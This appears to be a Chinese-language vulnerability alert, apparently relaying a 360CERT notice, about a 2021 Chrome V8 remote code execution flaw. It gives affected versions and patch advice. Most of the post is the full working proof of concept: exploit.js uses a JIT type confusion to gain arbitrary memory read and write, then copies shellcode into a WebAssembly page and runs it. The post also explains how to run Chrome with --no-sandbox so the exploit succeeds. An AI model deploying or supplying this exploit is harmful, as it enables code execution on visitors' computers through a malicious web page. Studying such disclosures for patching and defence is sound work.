2021年04月13日,360CERT监测发现国外安全研究员
发布了Chrome 远程代码执行 0Day
的POC详情.
该漏洞已验证.
漏洞级别
严重;Google:Chrome
: <=89.0.4389.114
组件: Chrome
漏洞类型: 命令执行
影响: 服务器接管
简述: 攻击者利用此漏洞,可以构造一个恶意的web页面,当用户访问该页面时,会造成远程代码执行。
目前该漏洞已在最新版本Chrome上得到验证
漏洞修复建议:
通用修补建议
目前Google只针对该漏洞发布了beta测试版Chrome(90.0.4430.70)修复,Chrome正式版(89.0.4389.114)仍存在漏洞,请关注官方Chrome正式版更新,及时修补漏洞。
临时修补建议
强烈建议广大用户在SandBox模式下运行Chrome
POC
https://github.com/r4j0x00/exploits/tree/master/chrome-0day
将以下网页丢到WEB服务里,用待测的chrome访问即可触发。但要注意,运行的chrome要在沙盒sandbox关闭的状态下才能利用成功!
可以在chrom快捷方式属性增加--no-sandbox 也可以在命令行启用chrome 键入:chrome.exe --no-sandbox
exploit.html代码:
<script src="exploit.js"></script>
exploit.js代码:
1 /* 2 /* 3 BSD 2-Clause License 4 Copyright (c) 2021, rajvardhan agarwal 5 All rights reserved. 6 Redistribution and use in source and binary forms, with or without 7 modification, are permitted provided that the following conditions are met: 8 1. Redistributions of source code must retain the above copyright notice, this 9 list of conditions and the following disclaimer. 10 2. Redistributions in binary form must reproduce the above copyright notice, 11 this list of conditions and the following disclaimer in the documentation 12 and/or other materials provided with the distribution. 13 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 14 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 15 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 16 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 17 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 18 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 19 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 20 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 21 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 22 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 23 */ 24 25 var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) 26 var wasm_mod = new WebAssembly.Module(wasm_code); 27 var wasm_instance = new WebAssembly.Instance(wasm_mod); 28 var f = wasm_instance.exports.main; 29 30 var buf = new ArrayBuffer(8); 31 var f64_buf = new Float64Array(buf); 32 var u64_buf = new Uint32Array(buf); 33 let buf2 = new ArrayBuffer(0x150); 34 35 function ftoi(val) { 36 f64_buf[0] = val; 37 return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); 38 } 39 40 function itof(val) { 41 u64_buf[0] = Number(val & 0xffffffffn); 42 u64_buf[1] = Number(val >> 32n); 43 return f64_buf[0]; 44 } 45 46 const _arr = new Uint32Array([2**31]); 47 48 function foo(a) { 49 var x = 1; 50 x = (_arr[0] ^ 0) + 1; 51 52 x = Math.abs(x); 53 x -= 2147483647; 54 x = Math.max(x, 0); 55 56 x -= 1; 57 if(x==-1) x = 0; 58 59 var arr = new Array(x); 60 arr.shift(); 61 var cor = [1.1, 1.2, 1.3]; 62 63 return [arr, cor]; 64 } 65 66 for(var i=0;i<0x3000;++i) 67 foo(true); 68 69 var x = foo(false); 70 var arr = x[0]; 71 var cor = x[1]; 72 73 const idx = 6; 74 arr[idx+10] = 0x4242; 75 76 function addrof(k) { 77 arr[idx+1] = k; 78 return ftoi(cor[0]) & 0xffffffffn; 79 } 80 81 function fakeobj(k) { 82 cor[0] = itof(k); 83 return arr[idx+1]; 84 } 85 86 var float_array_map = ftoi(cor[3]); 87 88 var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4]; 89 var fake = fakeobj(addrof(arr2) + 0x20n); 90 91 function arbread(addr) { 92 if (addr % 2n == 0) { 93 addr += 1n; 94 } 95 arr2[1] = itof((2n << 32n) + addr - 8n); 96 return (fake[0]); 97 } 98 99 function arbwrite(addr, val) { 100 if (addr % 2n == 0) { 101 addr += 1n; 102 } 103 arr2[1] = itof((2n << 32n) + addr - 8n); 104 fake[0] = itof(BigInt(val)); 105 } 106 107 function copy_shellcode(addr, shellcode) { 108 let dataview = new DataView(buf2); 109 let buf_addr = addrof(buf2); 110 let backing_store_addr = buf_addr + 0x14n; 111 arbwrite(backing_store_addr, addr); 112 113 for (let i = 0; i < shellcode.length; i++) { 114 dataview.setUint32(4*i, shellcode[i], true); 115 } 116 } 117 118 var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n)); 119 console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16)); 120 var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; 121 copy_shellcode(rwx_page_addr, shellcode); 122 f();
chrome安全考虑默认启动都是在沙盒中,因利用要诱导用户在no-sandbox下访问才能触发漏洞,所以利用又加了一个条件...